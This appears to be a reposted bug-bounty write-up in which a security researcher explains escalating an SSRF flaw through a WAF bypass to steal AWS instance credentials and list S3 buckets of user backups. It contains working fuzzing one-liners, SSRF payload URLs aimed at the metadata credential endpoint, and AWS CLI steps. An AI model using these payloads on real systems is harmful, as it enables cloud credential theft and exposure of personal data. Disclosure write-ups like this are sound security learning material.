Escalating SSRF to Accessing all user PII information by aws metadata

3 years ago 251
BOOK THIS SPACE FOR AD
ARTICLE AD

Santosh Kumar Sha (@killmongar1996)

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing how I was able to leaked all user PII information by SSRF aws metadata exploitation.

Don’t go outside without any reason . Stay home be safe and also safe other. Special request to my fellow bug-bounty hunter Take care of your health .

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

This is the write of my Recent bug that i found . While I was doing recon for gathering all urls from internet archives using waybackurls and gau. So started fuzzing the for ssrf vulnerability and found one but there was some filter going on behind the server which not allow me access the internal metadata but i bypass the waf to access the internal AWS metadata.

Suppose we assume the target name is example.com where every thing is in-scope like this:

In-scope : *.example.com

To gather all the urls from internet archives i have used waybackurls tool and gau.

gau -subs example.com

waybackurls example.com

So the chance of missing the urls still exist so in-order to be ahead of the game I don’t want to miss any urls for testing so I used subfinder and pipe to waybackurls to get all the urls for all the subdomain if exist and save it to a file.

gau -subs example.com >> vul1.txt

waybackurls example.com >> vul2.txt

subfinder -d example.com -silent | waybackurls >> vul3.txt

Now, we have collected all the urls ,so its times to resolve all the urls to filter out the dead urls from the list and filter out all the urls containing parameter for testing for vulnerability. So the command look like this below

cat vul1.txt vuln2.txt vul3.txt | grep “=” | sort -u | grep “?” | httpx -silent >> FUZZvul.txt

After Collecting all the urls containing parameter I starting fuzzing all the urls for finding SSRF but no success as the program is an well know bug-bounty program so I thought that all the other bugbounty hunter have already been tested and harden enough and If i find also the chances of duplicate is more because all others must have done these testing. Now, I was feeling burnout then i went out for some refreshment but still i was thinking about it.Suddenly something hit my mind, why not test for some hidden parameters. So i decided to use my magic trick which I call parameter sparing with some bash tricks to add my burp collaborator payload and proxy all urls to burp proxy to check the urls one by all as there was 200 urls .Here Is the command used for my magic parameter sparing

xargs -a /root/magicparameter/ssrf.txt -I@ bash -c ‘for url in $(cat FUZZvul.txt); do echo “$url&@=http://burpcollabrator.net”;done’ | httpx -http-proxy http://127.0.0.1:8080

Now I finally got an hit on my burp collaborator server with http and dns request with urls as

https://www.example.com/customer/item?custom_name=test123&website_url=http://burpcollabrator.net

So that to fuzzing further to get AWS internal metadata for the vulnerable domain like these:

https://www.example.com/customer/item?custom_name=test123&website_url=http://169.254.169.254/

I tried the above url it gives me 200 OK, but no success as there was some filtering going on behind or waf/firewall was not allowing to get the response for internal data access. But was not ready to leave it because i have spend 2 day on target i was very close to a P1 bug so leaving it was not an option and if i am not fast in bypass it anyone else can find it so time was running fast and have no clue at this moment.

So after all this I was stuck because If I report it then it will be an blind SSRF with low impact and one might I already found it so it might duplicate. So I decided to not to report and take these as an challenge to bypass it. As, I knew that i was able to access the internal metadata because i was getting 200 OK response but I was not able to see the response. But while i was scratching my head no idea so I decided while not ASK google about it. I came across an url “http://www.owasp.org.1ynrnhl.xip.io/” used for ssrf aws bypass trick. I decided to used that I was shocked to see it it actually work because the the waf/firewall was block the ip address not the domain name . So when ever you are stuck just ask GOOGLE and will get get the answer so goggling the problem is the key point.

So the final ssrf vulnerable url it look like this

So Now I decided to Escalating SSRF for maximum impact .

Grabbing the aws metadata by ssrf :

To get [AccessKeyId, SecretAccessKey, Token]

https://www.example.com/customer/item?custom_name=test123&website_url=http://www.owasp.org.1ynrnhl.xip.io/latest/meta-data/iam/security-credentials/Prod

2) Now to get [instanceId, accountId, region] .The item to keep in mind is "region": "eu-west-1". Now check the presence of security credentials. These credentials will lead us to the RCE.

https://www.example.com/customer/item?custom_name=test123&website_url=http://www.owasp.org.1ynrnhl.xip.io/latest/dynamic/instance-identity/document

To check if the credentials are usable we are going to use the AWS CLI. For the next commands, use the data from the above request and the region value we retrieved before (eu-west-1).

$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"
$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"

Now it’s time to check the identity of the token.

$ aws sts get-caller-identity{
"UserId": "Axxxxxxxxxxxxxxxxx:i-xxxxxxxxxxxxxxxxx",
"Account": "XXxxxxxxxxxx",
"Arn": "arn:aws:sts::19xxxxxxxxxx:XXXX/XXXXXX/i-xxxxxxxxxxxxxxxxx"
}

Now I just run the simple aws command in terminal to get all list of aws instances. Command used was:

aws s3 ls

Command list of aws instances and in that there was “prodbackUP_info” aws instance so I decided to check it out. So again I was aws cli.

aws s3 ls s3://prodbackUP_info

And i was able to access to all list user backup info file so be in safe side I already took the permission for further escalation.

I quickly reported the bug and in the next day the report was triage to critical

After seeing this my reaction …

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach to bypass the firewall to get AWS metadata accessed through SSRF aws metadata .So never stop when across any filtration or firewall or WAF because there are way to way them and always try to escalate bug to increase the impact for higher bounties.

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Read Entire Article